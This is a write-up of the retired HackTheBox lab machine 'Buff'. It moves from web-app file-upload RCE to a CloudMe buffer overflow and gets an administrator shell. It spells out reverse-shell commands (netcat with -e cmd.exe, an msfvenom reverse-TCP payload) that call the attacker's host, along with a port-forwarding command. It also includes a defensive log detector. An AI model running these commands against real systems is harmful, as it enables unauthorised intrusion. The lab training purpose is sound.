Buff is a retired vulnerable Windows machine available from HackTheBox. The machine maker is egotisticalSW, thank you. It has an Easy difficulty with a rating of 3.6 out of 10.
Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain a root shell together with both the user and root flags.
Exploitation Summary
- Vulnerability: Unauthenticated Remote Code Execution via Gym Management System 1.0
- Explanation: Gym Management System allows access to /upload.php without authentication. This results in malicious file upload and remote code execution
- Vulnerability: CloudMe version 1.11.2 buffer overflow
- Explanation: CloudMe version 1.11.2 has a buffer overflow vulnerability. The vulnerability can be exploited to achieve command execution
nmap -p- -A -T4 10.10.10.198
TCP 7680: pando-pub?
TCP 8080: Apache httpd 2.4.43
Two ports are open: 7680 and 8080. I am not familiar with port 7680, as it’s the first time I have encountered this port. A Google lookup shows that it could be used by WUDO (Windows Update Delivery Optimization). I connect to the port using netcat and enter some random commands, but the connection is closed without a response. Not sure if this port is exploitable, so I leave it for now.
Port 8080 is typically used for a proxy or website. Connecting to it with Firefox shows that it’s a website:
It’s a website about fitness. Navigating the website using the links on the homepage quickly lands on something interesting at the Contact page:
The contact page reveals that the site is using Gym Management Software 1.0. Let’s see if it’s vulnerable using searchsploit:
Yup, found an exploit available for this exact version. The exploit is easy to use. Simply run it with the URL:
python 48506.py http://10.10.10.198:8080/
Nice. We get in as user shaun. However, it’s not a full interactive shell. The exploit uploaded a small RCE PHP file and executes the commands you enter.
Let’s get a full shell using nc.exe (available at /usr/share/windows-resources/binaries/nc.exe). I use impacket-smbserver to start an SMB server to host the file:
Then start netcat listening on port 4005
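From the defender's side, the upload-then-execute pattern this kind of exploit leaves in the web server log is worth flagging. The following is an added example, not code from the original writeup or from the exploit: a small Python detector run over constructed Apache-style access log lines, flagging clients that POST to /upload.php and then request a .php file under /upload/ with a query string. The upload directory, filenames and query parameter are assumptions for the illustration, not details taken from the exploit.

```python
import re
from collections import defaultdict

# Constructed Apache combined-log style lines (not real server output).
# Assumed pattern: an unauthenticated POST to /upload.php followed by
# requests from the same client to a .php file under /upload/ carrying
# a query string. The filename and parameter name are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2021:10:00:01 +0000] "GET /contact.php HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2021:10:00:02 +0000] "POST /upload.php?id=x HTTP/1.1" 200 310
10.0.0.9 - - [01/Jan/2021:10:00:03 +0000] "GET /upload/shell.php?cmd=whoami HTTP/1.1" 200 24
10.0.0.9 - - [01/Jan/2021:10:00:04 +0000] "GET /upload/shell.php?cmd=dir HTTP/1.1" 200 1802
10.0.0.7 - - [01/Jan/2021:10:00:05 +0000] "POST /upload.php HTTP/1.1" 200 310
10.0.0.7 - - [01/Jan/2021:10:00:06 +0000] "GET /upload/avatar.png HTTP/1.1" 200 9000
"""

# Client IP, request method, request path and status from a combined-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def find_webshell_activity(log_text):
    """Return {client_ip: [suspicious request paths]} for clients that first
    POSTed to /upload.php and later fetched a .php file under /upload/ with
    a query string (the web shell command channel)."""
    uploaded = set()            # clients that have hit the upload endpoint
    hits = defaultdict(list)    # clients that then executed an uploaded .php
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path = m.group("ip"), m.group("method"), m.group("path")
        route, _, query = path.partition("?")
        if method == "POST" and route == "/upload.php":
            uploaded.add(ip)
        elif (ip in uploaded and route.startswith("/upload/")
              and route.endswith(".php") and query):
            hits[ip].append(path)
    return dict(hits)


if __name__ == "__main__":
    for ip, paths in find_webshell_activity(SAMPLE_LOG).items():
        print(f"{ip}: {len(paths)} suspicious request(s): {paths}")
```

A legitimate upload (10.0.0.7, which only fetches an image afterwards) is not flagged; only the client that uploads and then drives a .php file with a query string is reported.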
nc -nvlp 4005
And then run the following command at the 48506.py exploit command prompt:
\\10.10.14.35\share\nc.exe 10.10.14.35 4005 -e cmd.exe
Great. We get the initial shell as shaun and grab the user flag at C:\Users\shaun\Desktop.
I perform basic enumeration and quickly find something interesting:
tree /f /a
tasklist | findStr CloudMe
There is an executable CloudMe_1112.exe under the Downloads folder. The task list also shows that the service is running. This looks very interesting. Let’s check if it is vulnerable.
There are several exploits available. I tried all of them and only 48389.py was successful. Even 48389.py could fail at times.
NOTE: If you think you have the correct exploit but can’t get a reverse shell, the CloudMe service may be in an unexploitable state and a machine reset would be needed.
Since the available exploit does not work all the time, I decided to build my own exploit using the technique I learnt from my OSCP journey. Turns out the buffer overflow exploitation is very similar to those found in OSCP. I will post my custom buffer overflow exploit when it’s ready.
Let’s go back to the exploit 48389.py. The CloudMe service is using port 8888. We can confirm port 8888 is open locally to the machine using command netstat -na:
We can use plink.exe to set up a remote port forward that makes port 8888 available on our Kali machine. plink.exe can be found on the PuTTY download page, so I download the program and place it in my SMB server share.
When I try to establish the remote port forward, I have difficulty connecting through port 22. I believe the target machine has a firewall blocking port 22. So I changed Kali’s SSH service to port 4002 and then establish the remote port forward using plink.exe:
\\10.10.14.35\share\plink.exe -l root 10.10.14.35 -P 4002 -R 8888:127.0.0.1:8888
Once the remote port forward is established, we can access port 8888 on the Kali machine and all traffic will be forwarded to the target machine’s port 8888.
Next we need to create a reverse shell payload and use that to modify the exploit 48389.py:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.35 LPORT=4000 EXITFUNC=thread -f python -v payload
The msfvenom command will generate a payload in python format. Replace the payload in 48389.py with the generated one.
Note: Although the target system is an x64 machine, I tried the windows/x64/shell_reverse_tcp payload and it did not work. You must use the x86 payload.
Now start netcat listening on port 4000
nc -nvlp 4000
And then execute the exploit:
Awesome, we gain a shell as administrator and the root flag is retrieved.
Again, if the exploit doesn’t give you a reverse shell, try running it several times. If it still doesn’t work, you may need to reset the machine.